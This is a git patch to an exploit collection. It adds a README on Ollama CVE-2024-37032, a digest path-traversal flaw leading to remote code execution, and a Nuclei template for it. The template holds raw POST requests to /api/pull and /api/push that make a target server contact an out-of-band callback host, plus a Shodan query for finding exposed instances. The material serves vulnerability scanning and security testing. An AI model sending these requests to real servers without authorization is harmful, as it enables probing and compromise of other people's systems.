From 3e4fd2e8c4a1ceac08a570adedd7d15868c7fb01 Mon Sep 17 00:00:00 2001
From: cckuailong <346813862@qq.com>
Date: Tue, 5 Nov 2024 10:12:41 +0800
Subject: [PATCH] add ollama rce

---
 ollama/README.md                        | 26 +++++++++++++++
 ollama/nuclei-templates/ollama-rce.yaml | 44 +++++++++++++++++++++++++
 2 files changed, 70 insertions(+)
 create mode 100644 ollama/README.md
 create mode 100644 ollama/nuclei-templates/ollama-rce.yaml

diff --git a/ollama/README.md b/ollama/README.md
new file mode 100644
index 0000000..d54ba1e
--- /dev/null
+++ b/ollama/README.md
@@ -0,0 +1,26 @@
+# Ollama Vulnerabilities and Exploits
+
+Ollama is an open-source framework designed for running large language models (LLMs) locally, without the need for cloud services.
+
+## Vulnerabilities
+
+### Remote Code Execution
+
+- **Description**: Ollama before 0.1.34 does not validate the format of the digest (sha256 with 64 hex digits) when getting the model path, and thus mishandles the TestGetBlobsPath test cases such as fewer than 64 hex digits, more than 64 hex digits, or an initial ../ substring.
+- **Impact**: This vulnerability could allows an attacker to gain Remote Code Execution on the server.
+
+## Reports
+
+- **@Sagi Tzadik**: https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032
+
+## Disclaimer
+
+The vulnerabilities and associated exploits provided in this repository are for educational and ethical security testing purposes only.
+
+## Contribution
+
+Contributions to improve the exploits or documentation are welcome. Please follow the contributing guidelines outlined in the repository.
+
+## License
+
+All exploits and templates in this repository are released under the Apache 2.0 License.
\ No newline at end of file
diff --git a/ollama/nuclei-templates/ollama-rce.yaml b/ollama/nuclei-templates/ollama-rce.yaml
new file mode 100644
index 0000000..5f50b3d
--- /dev/null
+++ b/ollama/nuclei-templates/ollama-rce.yaml
@@ -0,0 +1,44 @@
+id: ollama-rce
+
+info:
+  name: Ollama - Remote Code Execution
+  author: kaks3c
+  severity: critical
+  description: |
+    Ollama before 0.1.34 does not validate the format of the digest (sha256 with 64 hex digits) when getting the model path, and thus mishandles the TestGetBlobsPath test cases such as fewer than 64 hex digits, more than 64 hex digits, or an initial ../ substring.
+  reference:
+    - https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-37032
+    - https://github.com/Bi0x/CVE-2024-37032
+  classification:
+    cpe: cpe:2.3:a:ollama:ollama:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: ollama
+    product: ollama
+    shodan-query: ollama
+  tags: cve,cve2024,ollama,rce
+
+http:
+  - raw:
+      - |
+        POST /api/pull HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name": "http://{{interactsh-url}}/rogue/{{randstr}}", "insecure": true}
+      - |
+        POST /api/push HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name": "http://{{interactsh-url}}/rogue/{{randstr}}", "insecure": true}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(interactsh_protocol, 'http')
+          - contains_all(header, 'application/x-ndjson') && contains(body_2, 'retrieving manifest')
+        condition: and
+# digest: 490a00463044022063a7f8fa50a53c2e31c321e1ce86cd56feba2b35b1fbf41eb2e501418f9a4bdd02203abcb683e5b57723f64e3891eebd4c9a7be2ba0fb0366d249c3cb0893370627c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file